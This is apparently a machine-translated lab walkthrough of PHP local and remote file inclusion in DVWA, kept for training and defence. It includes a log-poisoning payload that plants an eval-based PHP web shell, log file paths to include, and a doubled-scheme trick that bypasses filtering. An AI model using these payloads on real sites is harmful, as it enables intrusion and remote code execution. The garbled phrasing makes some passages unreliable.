basic knowledge:
php file that contains the vulnerability initiator is usually the following four functions:
require_once () and include_once () function and require () and include () is similar. However, if a file has been included too, then require_once () and include_once () is no longer contain it, in order to avoid the function redefinitions or variable heavy assignment and other issues.
In php.ini, allow_url_fopen has been the default On, from and after php5.2 allow_url_include it defaults to Off.
classification:
Local file contains:
It refers to open local files and contain loopholes.
Remote File Include:
Only when allow_url_fopen = On, allow_url_include = On are turned on in order to carry out remote file inclusion
1.low level
By seeing the source code directly to the incoming page parameters were included, without any filter
1. Local file contains
I dvwa built in windows, I d drive new flag.txt, contains the following manner:
In the case but generally did not get to directory information, we can contain the default location of the log
windows: apache/logs/access.log apache/logs/error.log
linux: /var/log/apache/access.log /var/log/apache2/access.log /var/log/apache/access_log /var/www/logs/access_log /var/log/access_log
There is also a corresponding error.log
The use of web logs contain
localhost/dvwa/vulnerabilities/fi/?page=<?php @eval($_POST['shell']);?>
Note that the browser will url encode special characters, leading to written word fails, you can use the packet capture decoding and then forwarded burpsuite
So log on the record of this request, the log contains the following, there will be a Trojan sentence
Ssh logs may comprise of a variety of ways, ssh log default location /var/log/auth.log
1. Remote File Inclusion
http comprising performed using conditions: allow_url_fopen on & allow_url_include on (off by default)
http://localhost/dvwa/vulnerabilities/fi/?page=http://www.baidu.com
2.medium level
View source
Str_replace found that the use of http: //, https: // replaced with a null
Str_replace function to the filter can be used for double the bypass
http://localhost/dvwa/vulnerabilities/fi/?page=hthttp://tp://www.baidu.com
Found to contain success
3.high level
View source
To begin with incoming page file, you can use the file: // protocol for file reading
to sum up
Whitelist filtering
open_basedir php authorized directory settings
open_basedir can range limit active user access to files in the designated area